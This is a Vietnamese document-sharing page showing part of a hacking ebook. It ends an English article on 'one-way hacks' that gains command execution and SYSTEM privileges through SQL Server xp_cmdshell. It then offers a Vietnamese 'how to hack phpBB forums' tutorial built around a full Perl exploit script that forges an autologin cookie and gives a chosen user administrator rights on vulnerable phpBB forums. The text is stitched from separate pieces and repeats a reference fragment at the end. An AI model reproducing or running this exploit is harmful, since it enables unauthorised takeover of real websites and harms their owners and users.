1. Trang chủ
  2. » Công Nghệ Thông Tin

Hacker Professional Ebook part 251 pdf

6 119 0

Đang tải... (xem toàn văn)

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Định dạng
Số trang 6
Dung lượng 199,9 KB

Nội dung

The screenshot below shows the "ipconfig" command being run on the database using the "xp_cmdshell" stored procedure: We have achieved remote command execution on an internal server which is not accessible from the outside! In fact, with this same example, we have also achieved privilege escalation, since we are accessing the database using system administrator credentials. A quick check by running "whoami.exe" would show us what privileges we get: The above screenshot verifies that we indeed have administrative privileges, that of the "NT_AUTHORITY\SYSTEM" user. 8.0 Concluding thoughts One-way hacks illustrate the fact that firewalls are not enough to protect a web application. A tight firewall can make things difficult for an attacker, but not keep the attacker entirely away. In fact, with tools like the file uploader, the web based command prompt and the web based SQL command prompt, it is just as easy to attack a web application and the underlying network with a tight firewall in place. SSL makes things even worse [8], from the point of view of securing the application. Many people think that SSL prevents such attacks. It does not. SSL is used only to encrypt the data between the web browser and the web server, to prevent eavesdropping. SSL provides no security to the web application, or the underlying network. All one-way hacks can be easily adapted to SSL, using libraries such as OpenSSL. 9.0 References 1. Web Hacking: Attacks and Defense - Saumil Shah, Shreeraj Shah, Stuart McClure, Addison Wesley, 2002 2. Inside-Out Attacks - Patrick Heim, Saumil Shah, 1999 3. Forms in HTML documents - multipart/form-data - from http://www.w3.org 4. RFC 1867 - Form-based File Upload in HTML 5. Microsoft IIS 5.0 In-Process Table Privilege Elevation Vulnerability 6. Linux Ptrace/Setuid Exec Vulnerability 7. Securiteam - Ptrace Exploit Code 8. SSL - a false sense of security by Chris Prosise and Saumil Shah Hết , phần cuối ngại dịch quá do đang vội nhưng có lẽ cũng ko ảnh hưởng gì lắm. Chúc cả nha vui vẻ pip(vniss) Hướng dẫn hack forum phpBB 2.0.11. (bài 1) Các bạn xem qua Exploits của nó : Trích: #!/usr/bin/perl -w # phpBB <=2.0.12 session autologin exploit # This script uses the vulerability in autologinid variable # More: http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=267563 # # Just gives an user on vulnerable forum administrator rights. # You should register the user before using this ;-) # by Kutas, kutas@mail15.com #P.S. I dont know who had made an original exploit, so I cannot place no (c) here # but greets goes to Paisterist who made an exploit for Firefox cookies if (@ARGV < 3) { print q( ++++++++++++++++++++++++++++++++++++++++++++++++++ + Usage: perl nenu.pl [site] [phpbb folder] [username] [proxy (optional)] i.e. perl nenu.pl www.site.com /forum/ BigAdmin 127.0.0.1:3128 ++++++++++++++++++++++++++++++++++++++++++++++++++ ++ ); exit; } use strict; use LWP::UserAgent; my $host = $ARGV[0]; my $path = $ARGV[1]; my $user = $ARGV[2]; my $proxy = $ARGV[3]; my $request = "http://"; $request .= $host; $request .= $path; use HTTP::Cookies; my $browser = LWP::UserAgent->new (); my $cookie_jar = HTTP::Cookies->new( ); $browser->cookie_jar( $cookie_jar ); $cookie_jar->set_cookie( "0","phpbb2mysql_data", "a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs %3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D", "/",$host,,,,,); if ( defined $proxy) { $proxy =~ s/(http:\/\/)//eg; $browser->proxy("http" , "http://$proxy"); } print "++++++++++++++++++++++++++++++++++++\n"; print "Trying to connect to $host$path"; if ($proxy) {print "using proxy $proxy";} my $response = $browser->get($request); die "Error: ", $response->status_line unless $response->is_success; if($response->content =~ m/phpbbprivmsg/) { print "\n Forum is vulnerable!!!\n"; } else { print "Sorry Not vulnerable"; exit();} print "+++++++++++++++++++++++++++++\nTrying to get the user:$user ID \n"; $response->content =~ /sid=([\w\d]*)/; my $sid = $1; $request .= "admin\/admin_ug_auth.php?mode=user&sid=$sid"; $response = $browser->post( $request, [ 'username' => $user, 'mode' => 'edit', 'mode' => 'user', 'submituser' => 'Look+up+User' ], ); die "Error: ", $response->status_line unless $response->is_success; if ($response->content =~ /name="u" value="([\d]*)"/) {print " Done ID=$1\n++++++++++++++++++++++++++++++\n";} else {print "No user $user found "; exit(); } my $uid = $1; print "Trying to give user:$user admin status \n"; $response = $browser->post( $request, [ 'userlevel' => 'admin', 'mode' => 'user', 'adv'=>'', 'u'=> $uid, 'submit'=> 'Submit' ], ); die "Error: ", $response->status_line unless $response->is_success; print " Well done!!! $user should now have an admin status \n++++++++++++++++++++++++++++"; . 2002 2. Inside-Out Attacks - Patrick Heim, Saumil Shah, 1999 3. Forms in HTML documents - multipart/form-data - from http://www.w3.org 4. RFC 1867 - Form-based File Upload in HTML 5. Microsoft

Ngày đăng: 04/07/2014, 12:20